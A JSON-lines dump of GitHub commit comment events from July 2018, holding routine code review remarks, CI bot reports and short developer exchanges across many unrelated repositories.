{"id":"8044642149","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29905685,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T14:54:07Z","updated_at":"2018-07-31T14:54:07Z","author_association":"MEMBER","body":"P.S. Wallet needs some tweak to adjust refresh button..."}},"created_at":"2018-07-31T14:54:07Z"}
{"id":"8044644249","type":"CommitCommentEvent","actor":{"login":"AmpYeen"},"repo":{"name":"AmpYeen/starbound-hyena-race"},"payload":{"comment":{"id":29905687,"position":null,"line":null,"path":null,"commit_id":"1e183a81f39fe5886fc3ae390784585e67517a1b","created_at":"2018-07-31T14:54:24Z","updated_at":"2018-07-31T14:54:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Ships](https://trello.com/c/j3hsV0Vi/15-ships)"}},"created_at":"2018-07-31T14:54:24Z"}
{"id":"8044645282","type":"CommitCommentEvent","actor":{"login":"Skylsmoi"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29905688,"position":43,"line":139,"path":"frontend/src/container/Account.jsx","commit_id":"3c47fa6fe7d1a624987bacb622be635ed9e2f5bc","created_at":"2018-07-31T14:54:33Z","updated_at":"2018-07-31T14:54:33Z","author_association":"COLLABORATOR","body":"rewrite this line as bellow:\r\n`export default connect(mapStateToProps)(translate()(Account))`\r\nit doesn't change anything but it's more consistent with the rest of the application"}},"created_at":"2018-07-31T14:54:33Z"}
{"id":"8044645993","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905689,"position":131,"line":131,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T14:54:40Z","updated_at":"2018-07-31T14:54:40Z","author_association":"NONE","body":"For so few elements, using a vector + linear search might or sorted vector + binary search might be more efficient."}},"created_at":"2018-07-31T14:54:40Z"}
{"id":"8044651614","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29905703,"position":27,"line":27,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/OAuth2TokenValidatorResult.java","commit_id":"2c7c48b79fcebb5162a1ff1b5394ee47eb3bbd94","created_at":"2018-07-31T14:55:31Z","updated_at":"2018-07-31T14:55:31Z","author_association":"OWNER","body":"Seems like there might be a set of classes out there that can already represent a complex response type like this. @rwinch does any existing Spring support come to mind?"}},"created_at":"2018-07-31T14:55:31Z"}
{"id":"8044653505","type":"CommitCommentEvent","actor":{"login":"msrepezza"},"repo":{"name":"msrepezza/hello-world"},"payload":{"comment":{"id":29905712,"position":null,"line":null,"path":null,"commit_id":"29dc0dfdedce9d0954a6080c0ed27c6a0160cfa3","created_at":"2018-07-31T14:55:47Z","updated_at":"2018-07-31T14:55:47Z","author_association":"OWNER","body":"hola que tal"}},"created_at":"2018-07-31T14:55:47Z"}
{"id":"8044656089","type":"CommitCommentEvent","actor":{"login":"Skylsmoi"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29905732,"position":258,"line":603,"path":"frontend/src/container/Dashboard.jsx","commit_id":"3c47fa6fe7d1a624987bacb622be635ed9e2f5bc","created_at":"2018-07-31T14:56:10Z","updated_at":"2018-07-31T14:56:10Z","author_association":"COLLABORATOR","body":"rewrite this line as bellow:\r\n`export default connect(mapStateToProps)(translate()(Dashboard))`\r\nit doesn't change anything but it's more consistent with the rest of the application"}},"created_at":"2018-07-31T14:56:10Z"}
{"id":"8044658218","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29905736,"position":154,"line":154,"path":"tests/libqos/virtio-9p.c","commit_id":"bf0f401549b261df82014779f9664ff7003d313b","created_at":"2018-07-31T14:56:28Z","updated_at":"2018-07-31T14:56:28Z","author_association":"OWNER","body":"just to be clear, extra_edge_opts adds \",addr=04.0\" while after_cmd_line \"-something else\", correct?"}},"created_at":"2018-07-31T14:56:28Z"}
{"id":"8044661379","type":"CommitCommentEvent","actor":{"login":"lauravignoli"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29905740,"position":5,"line":206,"path":"api/src/test/java/org/openmrs/module/msfcore/api/MSFCoreServiceTest.java","commit_id":"ae45c53aeac324cdb14ccf317f2ae974afd06bcd","created_at":"2018-07-31T14:56:53Z","updated_at":"2018-07-31T14:56:53Z","author_association":"NONE","body":"@kaweesi It would be cleaner to use builders in these tests, let's discuss the use of lombok tomorrow?"}},"created_at":"2018-07-31T14:56:53Z"}
{"id":"8044666605","type":"CommitCommentEvent","actor":{"login":"davidheyman"},"repo":{"name":"axismaps/imaginerio"},"payload":{"comment":{"id":29905749,"position":21,"line":54,"path":"src/js/legend.js","commit_id":"fb883aa9a261b7fdef6dca2c35bb1051fbfa3a81","created_at":"2018-07-31T14:57:38Z","updated_at":"2018-07-31T14:57:38Z","author_association":"MEMBER","body":"@awoodruff Can you check this now that I've updated the server code? This line is is giving me problems since `group` only ever has the `features` property."}},"created_at":"2018-07-31T14:57:38Z"}
{"id":"8044666812","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905751,"position":157,"line":157,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T14:57:40Z","updated_at":"2018-07-31T14:57:40Z","author_association":"NONE","body":"I am not sure that this does what you think it does. In Clang, every struct, even PODs, Aggregates are CXXRecordDecls when the parser is in C++ mode. What about `CXXRecordDecl::isAggregate`?\r\nI think the intention of the paper is to have the same definition of aggregate as the standard, so it should work well."}},"created_at":"2018-07-31T14:57:40Z"}
{"id":"8044667206","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29905752,"position":45,"line":50,"path":"Lesson3/train.rb","commit_id":"77b333383b773e43935da7f0a17a9031e610e75c","created_at":"2018-07-31T14:57:44Z","updated_at":"2018-07-31T14:57:44Z","author_association":"OWNER","body":"\"VladFiliucov 3 hours ago:\r\nили route.stations[@current_index]. Не думаю, что ради этого стоило экстрактить метод\"\r\nЯ сначала так и написал, а потом решил использовать тут уже существующий метод set_station"}},"created_at":"2018-07-31T14:57:44Z"}
{"id":"8044668295","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29905755,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-31T14:57:53Z","updated_at":"2018-07-31T14:57:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T14:57:53Z"}
{"id":"8044672135","type":"CommitCommentEvent","actor":{"login":"greglever"},"repo":{"name":"genomicsengland/GelReportModels"},"payload":{"comment":{"id":29905760,"position":null,"line":null,"path":null,"commit_id":"bbece6a57f1ff302bea942385a27737794bf6468","created_at":"2018-07-31T14:58:28Z","updated_at":"2018-07-31T14:58:28Z","author_association":"COLLABORATOR","body":"```\r\nINFO:root:Build/s finished succesfully!\r\nRemoving intermediate container c7f996727dd4\r\n ---> fcb958e4e14d\r\nSuccessfully built fcb958e4e14d\r\nSuccessfully tagged gel:latest\r\nroot@7eb45391bcc5:/gel# \r\n----------------------------------------------------------------------\r\nRan 153 tests in 10.576s\r\n\r\nOK\r\nroot@7eb45391bcc5:/gel/GelReportModels# \r\n```"}},"created_at":"2018-07-31T14:58:28Z"}
{"id":"8044674674","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905763,"position":168,"line":168,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T14:58:51Z","updated_at":"2018-07-31T14:58:51Z","author_association":"NONE","body":"I think I would move the attribute checks to the beginning of this function. This way the user could always overwrite the heuristics and has more control."}},"created_at":"2018-07-31T14:58:51Z"}
{"id":"8044675107","type":"CommitCommentEvent","actor":{"login":"lextm"},"repo":{"name":"RonaldCarter/PHPManager"},"payload":{"comment":{"id":29905764,"position":5,"line":13,"path":"Client/PHPManagerClient.csproj","commit_id":"1e7c22cff42461a0048a4ef898c394ab82a2a968","created_at":"2018-07-31T14:58:55Z","updated_at":"2018-07-31T14:58:55Z","author_association":"NONE","body":"Raw Windows Vista/Windows 7 does not have .NET Framework 4.x installed, so upgrading the project to .NET Framework 4.x is generally speaking a wrong approach (it adds an unnecessary dependencies that all your users must install separately)."}},"created_at":"2018-07-31T14:58:55Z"}
{"id":"8044682371","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29905789,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-31T14:59:55Z","updated_at":"2018-07-31T14:59:55Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - i386-Windows-7-VisualStudio-14: Tests Failed (2362 of 2928 tests passed, 57 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 562 tests had: Table big diffs.\n * 2 tests had: BND diffs.\n * 84 tests had: ESO big diffs.\n * 173 tests had: ESO small diffs.\n * 91 tests had: AUD diffs.\n * 40 tests had: MTR big diffs.\n * 105 tests had: MTR small diffs.\n * 27 tests had: ERR diffs.\n * 3 tests had: MTD diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table small diffs.\n * 1 test had: MDD diffs.\n * 1 test had: RDD diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 59\n * Failed: 566\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.67%25-red.png)</a> \n"}},"created_at":"2018-07-31T14:59:55Z"}
{"id":"8044682565","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905791,"position":187,"line":187,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T14:59:57Z","updated_at":"2018-07-31T14:59:57Z","author_association":"NONE","body":"nit: Redundant braces."}},"created_at":"2018-07-31T14:59:57Z"}
{"id":"8044689307","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905809,"position":196,"line":196,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:00:51Z","updated_at":"2018-07-31T15:00:51Z","author_association":"NONE","body":"Same comment as for `R->hasAttr<OwnerAttr>()` line."}},"created_at":"2018-07-31T15:00:51Z"}
{"id":"8044691382","type":"CommitCommentEvent","actor":{"login":"Pomax"},"repo":{"name":"Pomax/processing-bezier-master"},"payload":{"comment":{"id":29905817,"position":null,"line":null,"path":null,"commit_id":"0f8b5c64fa20cd7fefa859ed9f38f8dc48aab68c","created_at":"2018-07-31T15:01:08Z","updated_at":"2018-07-31T15:01:08Z","author_association":"OWNER","body":"what does a value of 0 represent?"}},"created_at":"2018-07-31T15:01:08Z"}
{"id":"8044692666","type":"CommitCommentEvent","actor":{"login":"triesz"},"repo":{"name":"SeleniumHQ/docker-selenium"},"payload":{"comment":{"id":29905822,"position":null,"line":null,"path":null,"commit_id":"a5005cdf7c84ee12f54e0b5d56cf1fc894be0412","created_at":"2018-07-31T15:01:19Z","updated_at":"2018-07-31T15:01:19Z","author_association":"NONE","body":"opened a ticket on this: https://github.com/SeleniumHQ/docker-selenium/issues/755"}},"created_at":"2018-07-31T15:01:19Z"}
{"id":"8044693916","type":"CommitCommentEvent","actor":{"login":"talhasch"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29905825,"position":null,"line":null,"path":null,"commit_id":"3dd73de76669892f9c4a11536fd0363f55ff7a99","created_at":"2018-07-31T15:01:30Z","updated_at":"2018-07-31T15:01:30Z","author_association":"CONTRIBUTOR","body":"done"}},"created_at":"2018-07-31T15:01:30Z"}
{"id":"8044694156","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905826,"position":196,"line":196,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:01:32Z","updated_at":"2018-07-31T15:01:32Z","author_association":"NONE","body":"Maybe we should ask Herb about making the precedence rules for these heuristics explicit in the paper?"}},"created_at":"2018-07-31T15:01:32Z"}
{"id":"8044700046","type":"CommitCommentEvent","actor":{"login":"jt1056"},"repo":{"name":"jt1056/chrom.io"},"payload":{"comment":{"id":29905836,"position":3,"line":3,"path":"LICENSE","commit_id":"c7ac1e1e038ef8571ae6f6c4fb01168169a4a47c","created_at":"2018-07-31T15:02:24Z","updated_at":"2018-07-31T15:02:24Z","author_association":"OWNER","body":"Jonathan Taveras "}},"created_at":"2018-07-31T15:02:24Z"}
{"id":"8044701136","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905845,"position":222,"line":222,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:02:34Z","updated_at":"2018-07-31T15:02:34Z","author_association":"NONE","body":"This part will no longer be required once we use `CXXRecordDecl::isAggregate`"}},"created_at":"2018-07-31T15:02:34Z"}
{"id":"8044704619","type":"CommitCommentEvent","actor":{"login":"MikeTaylor"},"repo":{"name":"folio-org/stripes-components"},"payload":{"comment":{"id":29905860,"position":null,"line":null,"path":null,"commit_id":"3213a126cc324348ab49411d83c699a29a4b2c4f","created_at":"2018-07-31T15:03:06Z","updated_at":"2018-07-31T15:03:06Z","author_association":"CONTRIBUTOR","body":"> render unto eslint what belongs to eslint\r\n\r\n:-)"}},"created_at":"2018-07-31T15:03:06Z"}
{"id":"8044704753","type":"CommitCommentEvent","actor":{"login":"nkcharan007"},"repo":{"name":"nkcharan007/Weely-challenges"},"payload":{"comment":{"id":29905861,"position":null,"line":null,"path":null,"commit_id":"4aff09bb8d34ac802e190c3b4f97a2728713c8c0","created_at":"2018-07-31T15:03:07Z","updated_at":"2018-07-31T15:03:07Z","author_association":"OWNER","body":"First challenge"}},"created_at":"2018-07-31T15:03:07Z"}
{"id":"8044705355","type":"CommitCommentEvent","actor":{"login":"gh843260227"},"repo":{"name":"gh843260227/leet"},"payload":{"comment":{"id":29905865,"position":null,"line":null,"path":null,"commit_id":"ec37dd2dad425fccbb5045318b325e2e8dd9b5de","created_at":"2018-07-31T15:03:12Z","updated_at":"2018-07-31T15:03:12Z","author_association":"OWNER","body":"LGTM"}},"created_at":"2018-07-31T15:03:12Z"}
{"id":"8044705518","type":"CommitCommentEvent","actor":{"login":"nkcharan007"},"repo":{"name":"nkcharan007/Weely-challenges"},"payload":{"comment":{"id":29905866,"position":null,"line":null,"path":null,"commit_id":"4aff09bb8d34ac802e190c3b4f97a2728713c8c0","created_at":"2018-07-31T15:03:14Z","updated_at":"2018-07-31T15:03:14Z","author_association":"OWNER","body":"First challenge"}},"created_at":"2018-07-31T15:03:14Z"}
{"id":"8044707827","type":"CommitCommentEvent","actor":{"login":"ntustison"},"repo":{"name":"ANTsX/ANTs"},"payload":{"comment":{"id":29905872,"position":null,"line":null,"path":null,"commit_id":"8463e3a217101c3ecdf94035ca66d02dd739df81","created_at":"2018-07-31T15:03:32Z","updated_at":"2018-07-31T15:03:32Z","author_association":"COLLABORATOR","body":"Hey @stnava , I'm pretty sure the original code snippet was a hack we made while they were changing the multi-threading.  I'm also pretty sure that it should just be deleted now."}},"created_at":"2018-07-31T15:03:32Z"}
{"id":"8044708815","type":"CommitCommentEvent","actor":{"login":"jt1056"},"repo":{"name":"jt1056/chrom.io"},"payload":{"comment":{"id":29905875,"position":2,"line":2,"path":"LICENSE","commit_id":"c7ac1e1e038ef8571ae6f6c4fb01168169a4a47c","created_at":"2018-07-31T15:03:41Z","updated_at":"2018-07-31T15:03:41Z","author_association":"OWNER","body":"[developers.google.com.pdf](https://github.com/jt1056/chrom.io/files/2245852/developers.google.com.pdf)\r\n"}},"created_at":"2018-07-31T15:03:41Z"}
{"id":"8044710776","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29905878,"position":null,"line":null,"path":null,"commit_id":"a58528687a9b5dd6f2021da7e3788b49a0dc0085","created_at":"2018-07-31T15:03:58Z","updated_at":"2018-07-31T15:03:58Z","author_association":"MEMBER","body":"Thank you, @joewiz!"}},"created_at":"2018-07-31T15:03:58Z"}
{"id":"8044711158","type":"CommitCommentEvent","actor":{"login":"sleepypioneer"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29905879,"position":11,"line":37,"path":"src/components/settingsNavigation/sortContacts.vue","commit_id":"119028715dcaab7b77c0f78bf443074e3186e350","created_at":"2018-07-31T15:04:02Z","updated_at":"2018-07-31T15:04:02Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-31T15:04:02Z"}
{"id":"8044711538","type":"CommitCommentEvent","actor":{"login":"mphardy"},"repo":{"name":"adafruit/Adafruit_CircuitPython_Motor"},"payload":{"comment":{"id":29905885,"position":null,"line":null,"path":null,"commit_id":"6699d76512ad4250e3ed1d65ec51b824069cce9e","created_at":"2018-07-31T15:04:06Z","updated_at":"2018-07-31T15:04:06Z","author_association":"NONE","body":"Hi,\r\nThis seems to break the adafruit_featherwing/motor_featherwing.py\r\n\r\n```\r\nTraceback (most recent call last):\r\n  File \"code.py\", line 6, in <module>\r\n  File \"adafruit_featherwing/motor_featherwing.py\", line 215, in stepper2\r\n  File \"adafruit_motor/stepper.py\", line 78, in __init__\r\nAttributeError: 'PWMChannel' object has no attribute 'frequency'\r\n```\r\n\r\nUsing the example stepper code:\r\n\r\n```\r\nfrom adafruit_featherwing import motor_featherwing\r\n\r\nwing = motor_featherwing.MotorFeatherWing()\r\n\r\nfor i in range(100):\r\n    wing.stepper2.onestep()\r\n```\r\n\r\nWith both CircuitPython 3.0.0 and 2.3.1 on the Feather M0 Express + DC Motor/Stepper FeatherWing."}},"created_at":"2018-07-31T15:04:06Z"}
{"id":"8044712293","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/setuptools-feedstock"},"payload":{"comment":{"id":29905890,"position":null,"line":null,"path":null,"commit_id":"479e5eede6e96144ef1af42f3bbaa6e31c5524cb","created_at":"2018-07-31T15:04:13Z","updated_at":"2018-07-31T15:04:13Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mingwandroid was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-31T15:04:13Z"}
{"id":"8044712735","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905892,"position":244,"line":244,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:04:16Z","updated_at":"2018-07-31T15:04:16Z","author_association":"NONE","body":"If you want to enforce this invariant, you could use llvm::PointerUnion. But I am fine with this as is. "}},"created_at":"2018-07-31T15:04:16Z"}
{"id":"8044713237","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29905893,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-31T15:04:21Z","updated_at":"2018-07-31T15:04:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T15:04:21Z"}
{"id":"8044716547","type":"CommitCommentEvent","actor":{"login":"vzapo"},"repo":{"name":"Lufii/zipzap"},"payload":{"comment":{"id":29905897,"position":null,"line":null,"path":null,"commit_id":"5d6a79d178e6cdd63d53f778fc50867cbfa161c5","created_at":"2018-07-31T15:04:51Z","updated_at":"2018-07-31T15:04:51Z","author_association":"NONE","body":"sa scapi de problemele cand uiti sa pui virgula si sa iti fie scris codu ok folosete linetru asta  https://github.com/standard/standard"}},"created_at":"2018-07-31T15:04:51Z"}
{"id":"8044721259","type":"CommitCommentEvent","actor":{"login":"sleepypioneer"},"repo":{"name":"team-popcorn/contacts"},"payload":{"comment":{"id":29905903,"position":25,"line":69,"path":"src/components/settingsNavigation/sortContacts.vue","commit_id":"119028715dcaab7b77c0f78bf443074e3186e350","created_at":"2018-07-31T15:05:34Z","updated_at":"2018-07-31T15:05:34Z","author_association":"NONE","body":"ok cool will get on that. some what familiar with local source I implemented it for the quote app I built while learning vue. thanks, I didn't see the comments until now (not familiar with that) but now I am on it!!"}},"created_at":"2018-07-31T15:05:34Z"}
{"id":"8044727799","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29905919,"position":null,"line":null,"path":null,"commit_id":"10979ef274f64c2909e817055c7dd61fb8151122","created_at":"2018-07-31T15:06:33Z","updated_at":"2018-07-31T15:06:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-463](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-463).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-463-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-31T15:06:33Z"}
{"id":"8044732031","type":"CommitCommentEvent","actor":{"login":"thinkseven"},"repo":{"name":"thinkseven/reactnd-redux-todos-goals"},"payload":{"comment":{"id":29905938,"position":4,"line":6,"path":"index.html","commit_id":"12a8de9199b9cd12e712c53e335279ece670edb1","created_at":"2018-07-31T15:07:13Z","updated_at":"2018-07-31T15:07:13Z","author_association":"OWNER","body":"implement redux library here"}},"created_at":"2018-07-31T15:07:13Z"}
{"id":"8044732734","type":"CommitCommentEvent","actor":{"login":"Xazax-hun"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29905941,"position":251,"line":251,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T15:07:19Z","updated_at":"2018-07-31T15:07:19Z","author_association":"NONE","body":"I wonder if having a `FieldDecl` will be sufficient in the future.\r\nWhat happens if we have multiple structs of the same type?\r\nE.g.:\r\n```\r\nstruct S { int* q; };\r\nvoid foo(S a, S b, S c) {\r\n}\r\n```\r\n\r\nIn order to distinguish the fields in `foo`, I think we would need both the VarDecl and the field. What do you think?"}},"created_at":"2018-07-31T15:07:19Z"}
{"id":"8044737220","type":"CommitCommentEvent","actor":{"login":"Nicofisi"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29905953,"position":24,"line":69,"path":"src/main/java/ch/njol/skript/expressions/ExprIdOf.java","commit_id":"c904c55a27501c9ed681528b9620a3afd64cceb6","created_at":"2018-07-31T15:07:59Z","updated_at":"2018-07-31T15:07:59Z","author_association":"MEMBER","body":"Okay so the `getMaterial` method that accepted an integer parameter was removed in 1.13 and the code wouldn't compile with it, that's what I meant. Thanks to both of you."}},"created_at":"2018-07-31T15:07:59Z"}
{"id":"8044739858","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29905956,"position":null,"line":null,"path":null,"commit_id":"475f58e72c893c1c689df64432b7a21cdb171263","created_at":"2018-07-31T15:08:23Z","updated_at":"2018-07-31T15:08:23Z","author_association":"MEMBER","body":"@jmontoyaa Just in case, session_id = 0 is changed to session_id = null in several other tables by the upgrade script from 1.10 to 1.11. This doesn't seem to be the case for learning paths though... is that normal? Should we add a note for us to do that for all tables between 1.11 and 2.0?"}},"created_at":"2018-07-31T15:08:23Z"}
{"id":"8044742892","type":"CommitCommentEvent","actor":{"login":"pr2git"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":29905966,"position":null,"line":null,"path":null,"commit_id":"ed689159e75bed8a8df56668bb3ca67d844468f6","created_at":"2018-07-31T15:08:50Z","updated_at":"2018-07-31T15:08:50Z","author_association":"NONE","body":"I understand your point of view, it is nice if translators can get the po files in that way.\r\nOn the other side, this means that people that use a stable release will only get the po from that official release, they cannot contribue to 'Dev' to provide the po files update before the image is released (except if they have a full build environment of course).\r\nSo your current process is always: release an image with non-translated strings, wait to translator to install it, install the po package, send back the translation to you and wait for next update to have the translation integrated for everybody.\r\nThis also means that translators needs to have a STB that is supported by OpenViX to be able to contribute to translation.\r\nAs a translator I offer a full french translation to OpenViX without having installed it (there was more than one thousand lines missing or to be reviewed in the translation I provide to OpenViX).\r\nI am perhaps so crazy that I provide translation for multiple images (even images that I don't use myself). :-)\r\n\r\nNow it is really up to you to decide if you want to keep the proposed script or not. I personally don't think that it interfered in any way with what is already existing, it is just another (easy) way for potential translators to help OpenViX.\r\n\r\nFor me the ideal world would be that the po files are regularly updated on the repository, so when someone want to translate, he just pick up the file there and he is sure that he is working on an up-to-date version."}},"created_at":"2018-07-31T15:08:50Z"}
{"id":"8044745483","type":"CommitCommentEvent","actor":{"login":"korenmiklos"},"repo":{"name":"korenmiklos/impvol-julia"},"payload":{"comment":{"id":29905974,"position":4,"line":304,"path":"calibrate_params.jl","commit_id":"b6783acf033c716841fdb3a7baaaca363ebedaba","created_at":"2018-07-31T15:09:14Z","updated_at":"2018-07-31T15:09:14Z","author_association":"OWNER","body":"This was a nasty bug to find!"}},"created_at":"2018-07-31T15:09:14Z"}
{"id":"8044746525","type":"CommitCommentEvent","actor":{"login":"jerryneedell"},"repo":{"name":"adafruit/Adafruit_CircuitPython_Motor"},"payload":{"comment":{"id":29905980,"position":null,"line":null,"path":null,"commit_id":"6699d76512ad4250e3ed1d65ec51b824069cce9e","created_at":"2018-07-31T15:09:22Z","updated_at":"2018-07-31T15:09:22Z","author_association":"NONE","body":"See issue #12 . I think this is \"in work\"."}},"created_at":"2018-07-31T15:09:22Z"}
{"id":"8044750109","type":"CommitCommentEvent","actor":{"login":"sQu1rr"},"repo":{"name":"DrKLO/Telegram"},"payload":{"comment":{"id":29905992,"position":null,"line":null,"path":null,"commit_id":"d073b80063c568f31d81cc88c927b47c01a1dbf4","created_at":"2018-07-31T15:09:54Z","updated_at":"2018-07-31T15:09:54Z","author_association":"NONE","body":"@arthurmelo88 \r\ngo to tmessageproj/jni/libtgvoip and do git fetch, and then git checkout 8faf6f6\r\nthat fixed it for me"}},"created_at":"2018-07-31T15:09:54Z"}
{"id":"8044752189","type":"CommitCommentEvent","actor":{"login":"jtdowdall"},"repo":{"name":"keras-team/keras"},"payload":{"comment":{"id":29905995,"position":null,"line":null,"path":null,"commit_id":"49a7c7376d0057ab85e00f1ee3387ce36797e994","created_at":"2018-07-31T15:10:14Z","updated_at":"2018-07-31T15:10:14Z","author_association":"NONE","body":"Why do we use a 1x1 conv2d instead of a dense layer for preds?"}},"created_at":"2018-07-31T15:10:14Z"}
